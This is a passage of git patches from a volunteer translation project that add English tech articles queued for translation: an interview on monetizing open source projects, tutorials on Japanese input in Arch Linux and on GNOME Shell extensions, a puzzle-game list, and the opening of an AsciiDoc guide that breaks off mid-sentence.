+[6]:https://www.2daygeek.com/install-enable-repoforge-rpmforge-repository-on-rhel-centos-sl/ +[7]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/ +[8]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/ +[9]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/ +[10]:/cdn-cgi/l/email-protection From 98d39659e9248529d4450fd31adfd876efa66df2 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:18:12 +0800 Subject: [PATCH 0891/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Mone?= =?UTF-8?q?tize=20an=20Open=20Source=20Project?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... How to Monetize an Open Source Project.md | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 sources/tech/20171107 How to Monetize an Open Source Project.md diff --git a/sources/tech/20171107 How to Monetize an Open Source Project.md b/sources/tech/20171107 How to Monetize an Open Source Project.md new file mode 100644 index 0000000000..113babe690 --- /dev/null +++ b/sources/tech/20171107 How to Monetize an Open Source Project.md @@ -0,0 +1,84 @@ +How to Monetize an Open Source Project +====== +The problem for any small group of developers putting the finishing touches on a commercial open source application is figuring out how to monetize the software in order to keep the bills paid and food on the table. Often these small pre-startups will start by deciding which of the recognized open source business models they're going to adapt, whether that be following Red Hat's lead and offering professional services, going the SaaS route, releasing as open core or something else. + +Steven Grandchamp, general manager for MariaDB's North America operations and CEO for Denver-based startup [Drud Tech][1], thinks that might be putting the cart before the horse. With an open source project, the best first move is to get people downloading and using your product for free. + +**Related:** [Demand for Open Source Skills Continues to Grow][2] + +"The number one tangent to monetization in any open source product is adoption, because the key to monetizing an open source product is you flip what I would call the sales funnel upside down," he told ITPro at the recent All Things Open conference in Raleigh, North Carolina. + +In many ways, he said, selling open source solutions is the opposite of marketing traditional proprietary products, where adoption doesn't happen until after a contract is signed. + +**Related:** [Is Raleigh the East Coast's Silicon Valley?][3] + +"In a proprietary software company, you advertise, you market, you make claims about what the product can do, and then you have sales people talk to customers. Maybe you have a free trial or whatever. Maybe you have a small version. Maybe it's time bombed or something like that, but you don't really get to realize the benefit of the product until there's a contract and money changes hands." + +Selling open source solutions is different because of the challenge of selling software that's freely available as a GitHub download. + +"The whole idea is to put the product out there, let people use it, experiment with it, and jump on the chat channels," he said, pointing out that his company Drud has a public chat channel that's open to anybody using their product. "A subset of that group is going to raise their hand and go, 'Hey, we need more help. We'd like a tighter relationship with the company. We'd like to know where your road map's going. We'd like to know about customization. We'd like to know if maybe this thing might be on your road map.'" + +Grandchamp knows more than a little about making software pay, from both the proprietary and open source sides of the fence. In the 1980s he served as VP of research and development at Formation Technologies, and became SVP of R&D at John H. Harland after it acquired Formation in the mid-90s. He joined MariaDB in 2016, after serving eight years as CEO at OpenLogic, which was providing commercial support for more than 600 open-source projects at the time it was acquired by Rogue Wave Software. Along the way, there was a two year stint at Microsoft's Redmond campus. + +OpenLogic was where he discovered open source, and his experiences there are key to his approach for monetizing open source projects. + +"When I got to OpenLogic, I was told that we had 300 customers that were each paying $99 a year for access to our tool," he explained. "But the problem was that nobody was renewing the tool. So I called every single customer that I could find and said 'did you like the tool?'" + +It turned out that nearly everyone he talked to was extremely happy with the company's software, which ironically was the reason they weren't renewing. The company's tool solved their problem so well there was no need to renew. + +"What could we have offered that would have made you renew the tool?" he asked. "They said, 'If you had supported all of the open source products that your tool assembled for me, then I would have that ongoing relationship with you.'" + +Grandchamp immediately grasped the situation, and when the CTO said such support would be impossible, Grandchamp didn't mince words: "Then we don't have a company." + +"We figured out a way to support it," he said. "We created something called the Open Logic Expert Community. We developed relationships with committers and contributors to a couple of hundred open source packages, and we acted as sort of the hub of the SLA for our customers. We had some people on staff, too, who knew the big projects." + +After that successful launch, Grandchamp and his team began hearing from customers that they were confused over exactly what open source code they were using in their projects. That lead to the development of what he says was the first software-as-a-service compliance portal of open source, which could scan an application's code and produce a list of all of the open source code included in the project. When customers then expressed confusion over compliance issues, the SaaS service was expanded to flag potential licensing conflicts. + +Although the product lines were completely different, the same approach was used to monetize MariaDB, then called SkySQL, after MySQL co-founders Michael "Monty" Widenius, David Axmark, and Allan Larsson created the project by forking MySQL, which Oracle had acquired from Sun Microsystems in 2010. + +Again, users were approached and asked what things they would be willing to purchase. + +"They wanted different functionality in the database, and you didn't really understand this if you didn't talk to your customers," Grandchamp explained. "Monty and his team, while they were being acquired at Sun and Oracle, were working on all kinds of new functionality, around cloud deployments, around different ways to do clustering, they were working on lots of different things. That work, Oracle and MySQL didn't really pick up." + +Rolling in the new features customers wanted needed to be handled gingerly, because it was important to the folks at MariaDB to not break compatibility with MySQL. This necessitated a strategy around when the code bases would come together and when they would separate. "That road map, knowledge, influence and technical information was worth paying for." + +As with OpenLogic, MariaDB customers expressed a willingness to spend money on a variety of fronts. For example, a big driver in the early days was a project called Remote DBA, which helped customers make up for a shortage of qualified database administrators. The project could help with design issues, as well as monitor existing systems to take the workload off of a customer's DBA team. The service also offered access to MariaDB's own DBAs, many of whom had a history with the database going back to the early days of MySQL. + +"That was a subscription offering that people were definitely willing to pay for," he said. + +The company also learned, again by asking and listening to customers, that there were various types of support subscriptions that customers were willing to purchase, including subscriptions around capability and functionality, and a managed service component of Remote DBA. + +These days Grandchamp is putting much of his focus on his latest project, Drud, a startup that offers a suite of integrated, automated, open source development tools for developing and managing multiple websites, which can be running on any combination of content management systems and deployment platforms. It is monetized partially through modules that add features like a centralized dashboard and an "intelligence engine." + +As you might imagine, he got it off the ground by talking to customers and giving them what they indicated they'd be willing to purchase. + +"Our number one customer target is the agency market," he said. "The enterprise market is a big target, but I believe it's our second target, not our first. And the reason it's number two is they don't make decisions very fast. There are technology refresh cycles that have to come up, there are lots of politics involved and lots of different vendors. It's lucrative once you're in, but in a startup you've got to figure out how to pay your bills. I want to pay my bills today. I don't want to pay them in three years." + +Drud's focus on the agency market illustrates another consideration: the importance of understanding something about your customers' business. When talking with agencies, many said they were tired of being offered generic software that really didn't match their needs from proprietary vendors that didn't understand their business. In Drud's case, that understanding is built into the company DNA. The software was developed by an agency to fill its own needs. + +"We are a platform designed by an agency for an agency," Grandchamp said. "Right there is a relationship that they're willing to pay for. We know their business." + +Grandchamp noted that startups also need to be able to distinguish users from customers. Most of the people downloading and using commercial open source software aren't the people who have authorization to make purchasing decisions. These users, however, can point to the people who control the purse strings. + +"It's our job to build a way to communicate with those users, provide them value so that they'll give us value," he explained. "It has to be an equal exchange. I give you value of a tool that works, some advice, really good documentation, access to experts who can sort of guide you along. Along the way I'm asking you for pieces of information. Who do you work for? How are the technology decisions happening in your company? Are there other people in your company that we should refer the product to? We have to create the dialog." + +In the end, Grandchamp said, in the open source world the people who go out to find business probably shouldn't see themselves as salespeople, but rather, as problem solvers. + +"I believe that you're not really going to need salespeople in this model. I think you're going to need customer success people. I think you're going to need people who can enable your customers to be successful in a business relationship that's more highly transactional." + +"People don't like to be sold," he added, "especially in open source. The last person they want to see is the sales person, but they like to ply and try and consume and give you input and give you feedback. They love that." + +-------------------------------------------------------------------------------- + +via: http://www.itprotoday.com/software-development/how-monetize-open-source-project + +作者:[Christine Hall][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.itprotoday.com/author/christine-hall +[1]:https://www.drud.com/ +[2]:http://www.itprotoday.com/open-source/demand-open-source-skills-continues-grow +[3]:http://www.itprotoday.com/software-development/raleigh-east-coasts-silicon-valley From fde6d795b3e015306bb918145495b7ed8b054404 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:19:26 +0800 Subject: [PATCH 0892/1627] add done: 20171107 How to Monetize an Open Source Project.md --- sources/tech/20171107 How to Monetize an Open Source Project.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171107 How to Monetize an Open Source Project.md b/sources/tech/20171107 How to Monetize an Open Source Project.md index 113babe690..ab51006101 100644 --- a/sources/tech/20171107 How to Monetize an Open Source Project.md +++ b/sources/tech/20171107 How to Monetize an Open Source Project.md @@ -1,5 +1,7 @@ How to Monetize an Open Source Project ====== + +![](http://www.itprotoday.com/sites/itprotoday.com/files/styles/article_featured_standard/public/ThinkstockPhotos-629994230_0.jpg?itok=5dZ68OTn) The problem for any small group of developers putting the finishing touches on a commercial open source application is figuring out how to monetize the software in order to keep the bills paid and food on the table. Often these small pre-startups will start by deciding which of the recognized open source business models they're going to adapt, whether that be following Red Hat's lead and offering professional services, going the SaaS route, releasing as open core or something else. Steven Grandchamp, general manager for MariaDB's North America operations and CEO for Denver-based startup [Drud Tech][1], thinks that might be putting the cart before the horse. With an open source project, the best first move is to get people downloading and using your product for free. From da317e00b6a0ab5b3afde45fad5985c9182efede Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:22:06 +0800 Subject: [PATCH 0893/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Setu?= =?UTF-8?q?p=20Japanese=20Language=20Environment=20In=20Arch=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nese Language Environment In Arch Linux.md | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md diff --git a/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md b/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md new file mode 100644 index 0000000000..17546c1b03 --- /dev/null +++ b/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md @@ -0,0 +1,98 @@ +How To Setup Japanese Language Environment In Arch Linux +====== + +![](https://www.ostechnix.com/wp-content/uploads/2017/11/Setup-Japanese-Language-Environment-In-Arch-Linux-720x340.jpg) + +In this tutorial, we will be discussing how to setup Japanese language environment in Arch Linux. In other Unix-like operating systems, it is not a big deal to setup Japanese layout. You can easily choose the Japanese keyboard layout from Settings. However, it is bit difficult under Arch Linux and there is no proper documentation in ArchWiki. If you're using Arch Linux and/or its derivatives like Antergos, Manajaro Linux, follow this guide to use Japanese language in your Arch Linux and its derivatives systems. + +### Setup Japanese Language Environment In Arch Linux + +First, install the necessary Japanese fonts for viewing Japanese ascii arts properly: +``` +sudo pacman -S adobe-source-han-sans-jp-fonts otf-ipafont +``` +``` +pacaur -S ttf-monapo +``` + +If you don't have Pacaur installed already, refer [**this link**][1]. + +Make sure you have commented out (add # to comment out) the following line in **/etc/locale.gen** file. +``` +#ja_JP.UTF-8 +``` + +Then, install **iBus** and **ibus-anthy**. For those wondering, iBus is Input method (IM) framework for Unix-like systems and ibus-anthy is the Japanese input method for iBus. +``` +sudo pacman -S ibus ibus-anthy +``` + +Add the following lines in **~/.xprofile** (If it doesn 't exist, create one): +``` +# Settings for Japanese input +export GTK_IM_MODULE='ibus' +export QT_IM_MODULE='ibus' +export XMODIFIERS=@im='ibus' + +#Toolbar for anthy +ibus-daemon -drx +``` + +The ~/.xprofile file allows us to execute commands at the beginning of the X user session before the window manager is started. + +Save and close the file. Restart your Arch Linux system to take effect the changes. + +After logging in to your system, right click on the iBus icon in the task bar and choose **Preferences**. If it is not there, run the following command from Terminal to start IBus and open the preferences window. +``` +ibus-setup +``` + +Choose Yes to start iBus. You will see a screen something like below. Click Ok to close it. + +[![][2]][3] + +Now, you will see the iBus preferences window. Go to **Input Method** tab and click "Add" button. + +[![][2]][4] + +Choose "Japanese" from the list: + +[![][2]][5] + +And then, choose "Anthy" and click Add. + +[![][2]][6] + +That's it. You will now see "Japanese - Anthy" in your Input Method section. + +[![][2]][7] + +Then change the options for Japanese input as per your requirement in the Preferences section (Click Japanese - Anthy -> Preferences). + +[![][2]][8] + +You can also edit the default shortcuts in the key bindings section. Once you made all changes, click Apply and OK. That's it. Choose the Japanese language from iBus icon in the task bar or press **SUPER KEY+SPACE BAR** to switch between Japanese and English languages (or any other default language in your system). You can change the keyboard shortcuts from IBus Preferences window. + +You know now how to use Japanese language in Arch Linux and derivatives. If you find our guides useful, please share them on your social, professional networks and support OSTechNix. + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/setup-japanese-language-environment-arch-linux/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com +[1]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[3]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus.png () +[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences.png () +[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/Choose-Japanese.png () +[6]:http://www.ostechnix.com/wp-content/uploads/2017/11/Japanese-Anthy.png () +[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences-1.png () +[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus-anthy.png () From 7c32e5cf7797f152feea9a0524102d55c0646e22 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:28:03 +0800 Subject: [PATCH 0894/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Use?= =?UTF-8?q?=20GNOME=20Shell=20Extensions=20[Complete=20Guide]?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...GNOME Shell Extensions [Complete Guide].md | 200 ++++++++++++++++++ 1 file changed, 200 insertions(+) create mode 100644 sources/tech/20171108 How to Use GNOME Shell Extensions [Complete Guide].md diff --git a/sources/tech/20171108 How to Use GNOME Shell Extensions [Complete Guide].md b/sources/tech/20171108 How to Use GNOME Shell Extensions [Complete Guide].md new file mode 100644 index 0000000000..db03bb5964 --- /dev/null +++ b/sources/tech/20171108 How to Use GNOME Shell Extensions [Complete Guide].md @@ -0,0 +1,200 @@ +How to Use GNOME Shell Extensions [Complete Guide] +====== +**Brief: This is a detailed guide showing you how to install GNOME Shell Extensions manually or easily via a browser. ** + +While discussing [how to install themes in Ubuntu 17.10][1], I briefly mentioned GNOME Shell Extension. It was used to enable user themes. Today, we'll have a detailed look at GNOME Shell Extensions in Ubuntu 17.10. + +I may use the term GNOME Extensions instead of GNOME Shell Extensions but both have the same meaning here. + +What are GNOME Shell Extensions? How to install GNOME Shell Extensions? And how to manage and remove GNOME Shell Extensions? I'll explain all these questions, one by one. + +Before that, if you prefer video, I have demonstrated all these on [It's FOSS YouTube channel][2]. I highly recommend that you subscribe to it for more Linux videos. + +## What is a GNOME Shell Extension? + +A [GNOME Shell Extension][3] is basically a tiny piece of code that enhances the capability of GNOME desktop. + +Think of it as an add-on in your browser. For example, you can install an add-on in your browser to disable ads. This add-on is developed by a third-party developer. Though your web browser doesn't provide it by default, installing this add-on enhances the capability of your web browser. + +Similarly, GNOME Shell Extensions are like those third-party add-ons and plugins that you can install on top of GNOME. These extensions are created to perform specific tasks such as display weather condition, internet speed etc. Mostly, you can access them in the top panel. + +![GNOME Shell Extension in action][5] + +There are also GNOME Extensions that are not visible on the top panel. But they still tweak GNOME's behavior. For example, middle mouse button can be used to close an application with one such extension. + +## Installing GNOME Shell Extensions + +Now that you know what are GNOME Shell Extensions, let's see how to install them. There are three ways you can use GNOME Extensions: + + * Use a minimal set of extensions from Ubuntu (or your Linux distribution) + * Find and install extensions in your web browser + * Download and manually install extensions + + + +Before you learn how to use GNOME Shell Extensions, you should install GNOME Tweak Tool. You can find it in the Software Center. Alternatively, you can use this command: +``` +sudo apt install gnome-tweak-tool +``` + +At times, you would also need to know the version of GNOME Shell you are using. This helps in determining whether an extension is compatible with your system or not. You can use the command below to find it: +``` +gnome-shell --version +``` + +### 1\. Use gnome-shell-extensions package [easiest and safest way] + +Ubuntu (and several other Linux distributions such as Fedora) provide a package with a minimal set of GNOME extensions. You don't have to worry about the compatibility here as it is tested by your Linux distribution. + +If you want a no-brainer, just get this package and you'll have 8-10 GNOME extensions installed. +``` +sudo apt install gnome-shell-extensions +``` + +You'll have to reboot your system (or maybe just restart GNOME Shell, I don't remember it at this point). After that, start GNOME Tweaks and you'll find a few extensions installed. You can just toggle the button to start using an installed extension. + +![Change GNOME Shell theme in Ubuntu 17.1][6] + +### 2. Install GNOME Shell extensions from a web browser + +GNOME project has an entire website dedicated to extensions. That's not it. You can find, install, and manage your extensions on this website itself. No need even for GNOME Tweaks tool. + +[GNOME Shell Extensions Website][3] + +But in order to install extensions a web browser, you need two things: a browser add-on and a native host connector in your system. + +#### Step 1: Install browser add-on + +When you visit the GNOME Shell Extensions website, you'll see a message like this: + +> "To control GNOME Shell extensions using this site you must install GNOME Shell integration that consists of two parts: browser extension and native host messaging application." + +![Installing GNOME Shell Extensions][7] + +You can simply click on the suggested add-on link by your web browser. You can install them from the link below as well: + +#### Step 2: Install native connector + +Just installing browser add-on won't help you. You'll still see an error like: + +> "Although GNOME Shell integration extension is running, native host connector is not detected. Refer documentation for instructions about installing connector" + +![How to install GNOME Shell Extensions][8] + +This is because you haven't installed the host connector yet. To do that, use this command: +``` +sudo apt install chrome-gnome-shell +``` + +Don't worry about the 'chrome' prefix in the package name. It has nothing to do with Chrome. You don't have to install a separate package for Firefox or Opera here. + +#### Step 3: Installing GNOME Shell Extensions in web browser + +Once you have completed these two requirements, you are all set to roll. Now when you go to GNOME Shell Extension, you won't see any error message. + +![GNOME Shell Extension][9] + +A good thing to do would be to sort the extensions by your GNOME Shell version. It is not mandatory though. What happens here is that a developer creates an extension for the present GNOME version. In one year, there will be two more GNOME releases. But the developer didn't have time to test or update his/her extension. + +As a result, you wouldn't know if that extension is compatible with your system or not. It's possible that the extension works fine even in the newer GNOME Shell version despite that the extension is years old. It is also possible that the extension doesn't work in the newer GNOME Shell. + +You can search for an extension as well. Let's say you want to install a weather extension. Just search for it and go for one of the search results. + +When you visit the extension page, you'll see a toggle button. + +![Installing GNOME Shell Extension ][10] + +Click on it and you'll be prompted if you want to install this extension: + +![Install GNOME Shell Extensions via web browser][11] + +Obviously, go for Install here. Once it's installed, you'll see that the toggle button is now on and there is a setting option available next to it. You can configure the extension using the setting option. You can also disable the extension from here. + +![Configuring installed GNOME Shell Extensions][12] + +You can also configure the settings of an extension that you installed via the web browser in GNOME Tweaks tool: + +![GNOME Tweaks to handle GNOME Shell Extensions][13] + +You can see all your installed extensions on the website under [installed extensions section][14]. You can also delete the extensions that you installed via web browser here + +![Manage your installed GNOME Shell Extensions][15] + +One major advantage of using the GNOME Extensions website is that you can see if there is an update available for an extension. You won't get it in GNOME Tweaks or system update. + +### 3. Install GNOME Shell Extensions manually + +It's not that you have to be always online to install GNOME Shell extensions. You can download the files and install it later, without needing internet. + +Go to GNOME Extensions website and download the extension with the latest version. + +![Download GNOME Shell Extension][16] + +Extract the downloaded file. Copy the folder to **~/.local/share/gnome-shell/extensions** directory. Go to your Home directory and press Crl+H to show hidden folders. Locate .local folder here and from there, you can find your path till extensions directory. + +Once you have the files copied in the correct directory, go inside it and open metadata.json file. Look for the value of uuid. + +Make sure that the name of the extension's folder is same as the value of uuid in the metadata.json file. If not, rename the directory to the value of this uuid. + +![Manually install GNOME Shell extension][17] + +Almost there! Now restart GNOME Shell. Press Alt+F2 and enter r to restart GNOME Shell. + +![Restart GNOME Shell][18] + +Restart GNOME Tweaks tool as well. You should see the manually installed GNOME extension in the Tweak tool now. You can configure or enable the newly installed extension here. + +And that's all you need to know about installing GNOME Shell Extensions. + +## Remove GNOME Shell Extensions + +It is totally understandable that you might want to remove an installed GNOME Shell Extension. + +If you installed it via a web browser, you can go to the [installed extensions section on GNOME website][14] and remove it from there (as shown in an earlier picture). + +If you installed it manually, you can remove it by deleting the extension files from ~/.local/share/gnome-shell/extensions directory. + +## Bonus Tip: Get notified of GNOME Shell Extensions updates + +By now you have realized that there is no way to know if an update is available for a GNOME Shell extension except for visiting the GNOME extension website. + +Luckily for you, there is a GNOME Shell Extension that notifies you if there is an update available for an installed extension. You can get it from the link below: + +[Extension Update Notifier][19] + +### How do you manage GNOME Shell Extensions? + +I find it rather weird that you cannot update the extensions via the system updates. It's as if GNOME Shell extensions are not even part of the system. + +If you are looking for some recommendation, read this article about [best GNOME extensions][20]. At the same time, share your experience with GNOME Shell extensions. Do you often use them? If yes, which ones are your favorite? + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/gnome-shell-extensions/ + +作者:[Abhishek Prakash][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/abhishek/ +[1]:https://itsfoss.com/install-themes-ubuntu/ +[2]:https://www.youtube.com/c/itsfoss?sub_confirmation=1 +[3]:https://extensions.gnome.org/ +[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-weather.jpeg +[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/enableuser-themes-extension-gnome.jpeg +[7]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-1.jpeg +[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-2.jpeg +[9]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-3.jpeg +[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-4.jpeg +[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-5.jpeg +[12]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-6.jpeg +[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-7-800x572.jpeg +[14]:https://extensions.gnome.org/local/ +[15]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-8.jpeg +[16]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-9-800x456.jpeg +[17]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/gnome-shell-extension-installation-10-800x450.jpg +[18]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/11/restart-gnome-shell-800x299.jpeg +[19]:https://extensions.gnome.org/extension/1166/extension-update-notifier/ +[20]:https://itsfoss.com/best-gnome-extensions/ From 73579b1b98049f1abd9588fb4af644bb1b04fde7 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:33:49 +0800 Subject: [PATCH 0895/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Improve=20Your?= =?UTF-8?q?=20Mental=20Mettle=20with=20These=20Open=20Source=20Puzzle=20Ga?= =?UTF-8?q?mes?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...tle with These Open Source Puzzle Games.md | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 sources/tech/20170923 Improve Your Mental Mettle with These Open Source Puzzle Games.md diff --git a/sources/tech/20170923 Improve Your Mental Mettle with These Open Source Puzzle Games.md b/sources/tech/20170923 Improve Your Mental Mettle with These Open Source Puzzle Games.md new file mode 100644 index 0000000000..5650a304bf --- /dev/null +++ b/sources/tech/20170923 Improve Your Mental Mettle with These Open Source Puzzle Games.md @@ -0,0 +1,62 @@ +Improve Your Mental Mettle with These Open Source Puzzle Games +====== +### Tax Your Brain, Not Your Wallet + +Puzzle video games are a type of game that focuses on puzzle solving. A puzzle is a problem or set of problems a player has to solve within the confines of the game. + +The puzzle genre often tests problem-solving skills enhancing both analytical and critical thinking skills. Word completion, pattern recognition, logical reasoning, persistence, and sequence solving are some of the skills often required to prosper here. Some games offer unlimited time or attempts to solve a puzzle, others present time-limited exercises which increase the difficulty of the puzzle. Most puzzle games are basic in graphics but are very addictive. + +This genre owes its origins to puzzles and brain teasers. Traditional thinking games such as Hangman, Mastermind, and the mathematical game Nim were early computer implementations. + +Software developers can shape a gamer's brain in a multitude of directions -- cognitive awareness, logistics, reflexes, memory, to cite a selection -- puzzle games are appealing for all ages. + +Many of the biggest computer games concentrate on explosion-filled genres. But there's still strong demand for compelling puzzle games. It's a neglected genre in the mainstream. Here are our picks of the best games. We only advocate open source games here. And we give preference to games that run on multiple operating systems. + + +**PUZZLE GAMES** + +| --- | --- | +| **[Trackballs][1]** | Inspired by Marble Madness | +| **[Fish Fillets - Next Generation][2]** | Port of the Puzzle Game Fish Fillets | +| **[Frozen Bubble][3]** | A clone of the popular “Puzzle Bobble” game | +| **[Neverball][4]** | Tilt the Floor to Roll a Ball Game | +| **[Crack Attack!][5]** | Based on the Super Nintendo classic Tetris Attack + | +| **[Brain Workshop][6]** | Dual N-Back Game | +| **[Angry, Drunken Dwarves][7]** | “Falling Blocks” Puzzle Game | +| **[gbrainy][8]** | Brain Teaser Game for GNOME | +| **[Enigma][9]** | Huge Collection of Puzzle Games | +| **[Amoebax][10]** | Cute and Addictive Action-Puzzle Game | +| **[Dinothawr][11]** | Save your frozen friends by pushing them onto lava | +| **[Pingus][12]** | Lemmings Like Game | +| **[Kmahjongg][13]** | Remove Matching Mahjongg Tiles to Clear the Board | + + +For other games, check out our **[Games Portal page][14]**. + + +-------------------------------------------------------------------------------- + +via: https://www.ossblog.org/improve-your-mental-mettle-with-these-open-source-puzzle-games/ + +作者:[Steve Emms][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ossblog.org/author/steve/ +[1]:https://www.ossblog.org/trackballs-inspired-marble-madness/ +[2]:https://www.ossblog.org/fish-fillets-ng-port-puzzle-game-fish-fillets/ +[3]:https://www.ossblog.org/frozen-bubble-puzzle-bobble-style-game/ +[4]:https://www.ossblog.org/neverball-tilt-floor-roll-ball-game/ +[5]:https://www.ossblog.org/crack-attack-based-super-nintendo-classic-tetris-attack/ +[6]:https://www.ossblog.org/brain-workshop-dual-n-back-game/ +[7]:https://www.ossblog.org/angry-drunken-dwarves-falling-blocks-puzzle-game/ +[8]:https://www.ossblog.org/gbrainy-brain-teaser-game-gnome/ +[9]:https://www.ossblog.org/enigma-huge-collection-puzzle-games/ +[10]:https://www.ossblog.org/amoebax-cute-addictive-action-puzzle-game/ +[11]:https://www.ossblog.org/dinothawr-save-frozen-friends/ +[12]:https://www.ossblog.org/pingus-lemmings-like-game/ +[13]:https://www.ossblog.org/kmahjongg-remove-matching-mahjongg-tiles-clear-board/ +[14]:https://www.ossblog.org/free-games/ From 0b6d285370e8cafeb78547f49665d5bb9c84cf17 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 21:37:28 +0800 Subject: [PATCH 0896/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Complete=20Guid?= =?UTF-8?q?e=20for=20Using=20AsciiDoc=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...plete Guide for Using AsciiDoc in Linux.md | 347 ++++++++++++++++++ 1 file changed, 347 insertions(+) create mode 100644 sources/tech/20171030 Complete Guide for Using AsciiDoc in Linux.md diff --git a/sources/tech/20171030 Complete Guide for Using AsciiDoc in Linux.md b/sources/tech/20171030 Complete Guide for Using AsciiDoc in Linux.md new file mode 100644 index 0000000000..b321f4fb23 --- /dev/null +++ b/sources/tech/20171030 Complete Guide for Using AsciiDoc in Linux.md @@ -0,0 +1,347 @@ +Complete Guide for Using AsciiDoc in Linux +====== +**Brief: This detailed guide discusses the advantages of using AsciiDoc and shows you how to install and use AsciiDoc in Linux.** + +Over the years I used many different tools to write articles, reports or documentation. I think all started for me with Luc Barthelet's Epistole on Apple IIc from the French editor Version Soft. Then I switched to GUI tools with the excellent Microsoft Word 5 for Apple Macintosh, then the less convincing (to me) StarOffice on Sparc Solaris, that was already known as OpenOffice when I definitively switched to Linux. All these tools were really [word-processors][1]. + +But I was never really convinced by [WYSIWYG][2] editors. So I investigated many different more-or-less human-readable text formats: [troff][3], [HTML][4], [RTF][5], [TeX][6]/[LaTeX][7], [XML][8] and finally [AsciiDoc][9] which is the tool I use the most today. In fact, I am using it right now to write this article! + +If I made that history, it was because somehow the loop is closed. Epistole was a word-processor of the text-console era. As far as I remember, there were menus and you can use the mouse to select text -- but most of the formatting was done by adding non-intrusive tags into the text. Just like it is done with AsciiDoc. Of course, it was not the first software to do that. But it was the first I used! + + +![Controlling text alignment in Luc Barthelet's Epistole \(1985-Apple II\) by using commands embedded into the text][11] + +### Why AsciiDoc (or any other text file format)? + +I see two advantages in using text formats for writing: first, there is a clear separation between the content and the presentation. This argument is open to discussion since some text formats like TeX or HTML require a good discipline to adhere to that separation. And on the other hand, you can somehow achieve some level of separation by using [templates and stylesheets][12] with WYSIWYG editors. I agree with that. But I still find presentation issues intrusive with GUI tools. Whereas, when using text formats, you can focus on the content only without any font style or widow line disturbing you in your writing. But maybe it's just me? However, I can't 